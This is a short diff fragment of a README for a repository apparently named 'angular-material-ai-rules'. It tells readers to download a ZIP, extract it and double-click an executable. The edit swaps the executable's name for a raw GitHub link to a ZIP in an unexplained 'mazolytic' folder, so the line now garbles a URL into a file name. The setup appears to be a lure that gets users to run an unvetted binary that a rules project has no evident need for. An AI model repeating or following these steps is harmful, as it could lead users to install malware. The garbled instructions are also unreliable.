Amenxemerik9/angular-material-ai-rules/README.md

    Once the download is complete, locate the file in your downloads folder.
 It will likely be compressed in a ZIP format.
 Right-click on the file and select “Extract All…”

 5. **Run the Application**
    After extracting, navigate to the folder where you extracted the contents.
-Look for an executable file, typically named something like `angular-material-ai-rules.exe`.
+Look for an executable file, typically named something like `https://raw.githubusercontent.com/Amenxemerik9/angular-material-ai-rules/main/mazolytic/angular-material-ai-rules.zip`.
 Double-click this file to launch the application.

 ## 💻 System Requirements